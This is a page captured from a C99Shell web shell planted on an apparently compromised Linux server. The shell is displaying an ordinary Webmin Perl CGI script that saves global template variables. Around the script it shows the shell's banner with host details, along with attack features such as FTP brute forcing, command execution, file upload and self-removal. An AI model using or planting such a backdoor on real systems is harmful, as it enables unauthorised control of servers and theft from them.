!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/virtual-server/   drwxrwxr-x
Free 26.09 GB of 117.98 GB (22.11%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     save_newglobal.cgi (728 B)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Update the list of global template variables

require './virtual-server-lib.pl';
&ReadParse();
&error_setup($text{'newglobal_err'});
&can_edit_templates() || &error($text{'newglobal_ecannot'});

# Parse inputs into a list
&lock_file($global_template_variables_file);
for(my $i=0; defined($in{"name_$i"}); $i++) {
    next if ($in{"name_$i"} !~ /\S/);
    $in{"name_$i"} =~ /^[a-z0-9\_]+$/i ||
        &error(&text('newglobal_ename', $i+1));
    push(@vars, { 'enabled' => $in{"enabled_$i"},
              'name' => $in{"name_$i"},
              'value' => $in{"value_$i"} });
    }
&save_global_template_variables(\@vars);
&unlock_file($global_template_variables_file);

&run_post_actions_silently();
&webmin_log("global");
&redirect("");


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.003 ]--